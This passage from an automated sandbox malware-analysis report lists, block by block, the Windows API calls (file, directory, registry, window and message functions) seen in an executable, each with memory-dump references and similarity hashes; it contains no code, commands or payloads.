                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                              • Opcode ID: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
                                                                                                                                              • Instruction ID: e4d993762fdbf4af8c35b1588ad4eaffa1172a51f023226dd59e00ceba6dfa89
                                                                                                                                              • Opcode Fuzzy Hash: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
                                                                                                                                              • Instruction Fuzzy Hash: 12E086335042106BD2105B70AF4487773B89E94704306083EF546F2044D778DC329A6D
                                                                                                                                              APIs
                                                                                                                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                              • Opcode ID: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
                                                                                                                                              • Instruction ID: 2c738a9deecb2df013c07ba3b1cf6af0bd96662f3609e31d22ea84ca5a045a2b
                                                                                                                                              • Opcode Fuzzy Hash: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
                                                                                                                                              • Instruction Fuzzy Hash: 4FE08C326005009BCB20AFB5AB4999D3375DF50369710007BE442F10E1CABC9C408A2D
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00405D5C
                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                              • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                                                              • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                                                                                                              • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                                                              • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405938,?,?,00000000,00405B0E,?,?,?,?), ref: 00405D38
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D4C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                              • Instruction ID: bbac5bc73aa77dea78574471440e90d8105817861fa72b5948562f5081259be0
                                                                                                                                              • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                              • Instruction Fuzzy Hash: 1CD0C976504520ABC2112728AE0C89BBB55EB54371B028B35FAA9A22B0CB304C568A98
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405834
                                                                                                                                              • GetLastError.KERNEL32 ref: 00405842
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                              • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                                                              • Instruction ID: 106bcc9dbfec6d9c4c73fbe0ebad0997e3226ea8ec62ae9f19e78208b048f617
                                                                                                                                              • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                                                              • Instruction Fuzzy Hash: C9C04C31204A019AD6606B209F09B177954EB50741F1184396946E00A0DB348425DE2D
                                                                                                                                              APIs
                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 390214022-0
                                                                                                                                              • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                              • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                                              • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                              • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0040CEF0,004032EF,0040CEF0,?,00414EF0,00004000,?,00000000,00403119,00000004), ref: 00405E1E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                              • Instruction ID: 23ec5f7379bf279edb3dbb3262258d5736cfdadd2d5b14d2449b9c6e52f850f2
                                                                                                                                              • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                              • Instruction Fuzzy Hash: 4DE08C3224021EABCF109F50CC08EEB3B6CEB00360F044432FA99E2080D230EA209BE4
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Open
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                              • Opcode ID: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
                                                                                                                                              • Instruction ID: 027cd1837f043f16bcd3791d2c18ee9a5769249626570c171517a7e702d59ee3
                                                                                                                                              • Opcode Fuzzy Hash: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
                                                                                                                                              • Instruction Fuzzy Hash: 17E0EC76254108BFDB10EFA9EE4BFE97BECAB44704F008435BA09E70E1C674E5509B69
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040336B,?,?,0040326F,00414EF0,00004000,?,00000000,00403119), ref: 00405DEF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                              • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                              • Instruction ID: 619b4f5876fe922fe119770d1c4b6382a551d6d1c0a67235faeb4c306daddfa0
                                                                                                                                              • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                              • Instruction Fuzzy Hash: BAE08C3220021AABCF10AF90CC04AEB3B6CEB083A0F004833F951E3140D230E9618BE4
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
                                                                                                                                              • Instruction ID: 2f2862f802f4bb8c259b254183006bf3f0de574643f6f04ef9dece27a841d158
                                                                                                                                              • Opcode Fuzzy Hash: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
                                                                                                                                              • Instruction Fuzzy Hash: 24C04C71740600BBDA208B509E45F1677546754740F1448697740A50E0C674E410D62D
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                              • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                                              • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                              • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
